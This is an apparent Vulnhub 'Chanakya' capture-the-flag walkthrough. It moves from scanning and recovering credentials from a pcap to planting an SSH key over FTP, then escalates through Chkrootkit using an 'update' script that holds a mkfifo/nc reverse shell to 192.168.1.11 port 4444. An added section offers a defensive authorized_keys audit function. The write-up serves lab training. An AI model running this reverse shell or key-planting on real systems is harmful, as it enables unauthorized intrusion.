Vulnhub Chanakya Walkthrough

We start by scanning the host with nmap -A -T4 -p- 192.168.1.9 -vv

Running dirb against the host turned up several directories and a text file.

The text file contains the string nfubxn.cpncat. It makes no sense as written, but decoding it as ROT13 (for example at https://rot13.com/) gives ashoka.pcapng, a capture file which we can view in Tshark or tcpdump, or with tcpick:

tcpick -C -yP -r ashoka.pcapng

Now we have a username, ashoka, and a password, kautilya.

Over the host's FTP service, we create a .ssh folder and upload our authorized_keys file from our own ssh folder using the put command:

mkdir .ssh

cd .ssh

On our machine:

ssh-keygen

cat id_rsa.pub > authorized_keys

cp authorized_keys /root/

On the host:

put authorized_keys

Now exit the FTP session and log in over SSH:

ssh ashoka@192.168.1.9
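
The authorized_keys upload above succeeds because nothing on the host checks which keys are allowed to log in. As an added example (not part of the original walkthrough), this shell function audits every authorized_keys file under a home root against an allowlist; the function name, the allowlist file format and the sample keys are assumptions constructed for the illustration.

```shell
#!/bin/sh
# Added example (not from the walkthrough): report authorized_keys entries
# whose key blob is not on an approved list.
#   $1  directory holding the user homes (e.g. /home)
#   $2  allowlist file, one approved base64 key blob per line (assumed format)
# Prints "<file>: <keytype> <comment>" per unapproved key; returns 1 if any.
audit_authorized_keys() {
    home_root=$1
    approved=$2
    found=0
    for f in "$home_root"/*/.ssh/authorized_keys; do
        [ -f "$f" ] || continue
        out=$(awk -v file="$f" '
            FILENAME == ARGV[1] { ok[$1] = 1; next }   # load the allowlist
            /^[ \t]*(#|$)/ { next }                    # comments, blank lines
            {
                # Options (from=, command=, ...) may precede the key type,
                # so find the type field and take the blob right after it.
                for (i = 1; i < NF; i++)
                    if ($i ~ /^(ssh-(rsa|dss|ed25519)|ecdsa-sha2-|sk-)/) {
                        if (!($(i + 1) in ok))
                            print file ": " $i " " $(i + 2)
                        next
                    }
                print file ": unparsed line " FNR      # no key type found
            }' "$approved" "$f")
        if [ -n "$out" ]; then
            printf '%s\n' "$out"
            found=1
        fi
    done
    return "$found"
}

# Constructed sample data: one approved key, one key nobody approved.
demo=$(mktemp -d)
mkdir -p "$demo/alice/.ssh" "$demo/ashoka/.ssh"
echo 'AAAAC3constructedApprovedBlob' > "$demo/approved"
echo 'ssh-ed25519 AAAAC3constructedApprovedBlob alice@laptop' \
    > "$demo/alice/.ssh/authorized_keys"
echo 'no-pty ssh-rsa AAAAB3constructedUnknownBlob root@attacker' \
    > "$demo/ashoka/.ssh/authorized_keys"
audit_authorized_keys "$demo" "$demo/approved" || echo "unapproved keys present"
rm -rf "$demo"
```

Run from cron or a configuration-management job, a non-zero return is the signal that a key appeared outside the approved process.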

In the tmp folder there is a log file; reading it shows that it comes from Chkrootkit, which we can exploit using:

echo '#!/bin/bash' > update

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.11 4444 >/tmp/f' >> update

chmod 777 update

./update

Open a listener on your machine using nc -lvp 4444
